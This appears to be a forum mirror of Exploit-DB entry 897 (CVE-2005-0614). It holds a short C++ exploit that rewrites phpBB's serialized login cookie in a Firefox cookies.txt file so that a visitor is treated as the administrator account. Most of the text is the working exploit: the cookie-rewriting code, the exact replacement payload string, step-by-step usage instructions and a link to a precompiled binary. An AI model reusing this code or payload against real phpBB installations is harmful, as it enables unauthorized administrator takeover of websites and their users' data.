- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 897
- Проверка EDB
-
- Пройдено
- Автор
- STR0KE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2005-0614
- Дата публикации
- 2005-03-24
C++:
/* Paisterist's code was nice but heres mil's version.
* precompiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/897.rar
* Usage:
* bcc32 897.cpp
* and place the exe in your firefox profile dir.
* Usually C:\Documents and Settings\Application Data\Mozilla\Firefox\Profiles\something.default
* Visit a site with phpbb, close the browser, double click the exe, browse site.
* This gives anonymous users administrator rights only.
* Ya its lame im bored kthnx. If something goes wrong clear cookies.
*
* /str0ke
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
//Taken from VeNoMouS's love cow code
char *search_and_replace (char *text, char *find, char *replace)
{
char *found,*new_text;
int
len_find=strlen(find),len_replace=strlen(replace),len_text=strlen(text),i=0,j=0;
if((new_text=(char*)malloc(len_text+len_replace-len_find+1))==NULL)
{
printf("malloc issue...\n");
return new_text;
}
found = strstr(text, find);
while (i <= len_text)
{
if ( found != text + i )
{
new_text[j] = text[i];
i++;
j++;
}
else
{
strcat (new_text, replace);
i += len_find;
j += len_replace;
found = strstr (text + i, find);
}
new_text[j] = '\0';
}
return new_text;
}
int main()
{
FILE * pFile;
long lSize;
char * buffer;
pFile = fopen ( "cookies.txt" , "r" );
if (pFile==NULL) exit (1);
fseek (pFile , 0 , SEEK_END);
lSize = ftell (pFile);
rewind (pFile);
buffer = (char*) malloc (lSize);
if (buffer == NULL) exit (2);
fread (buffer,1,lSize,pFile);
fclose (pFile);
pFile = fopen ( "cookies.txt" , "w" );
fputs(search_and_replace((char *)buffer,"a%3A0%3A%7B%7D","a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"), pFile);
fclose (pFile);
free (buffer);
return 0;
}
// milw0rm.com [2005-03-24]- Источник
- www.exploit-db.com
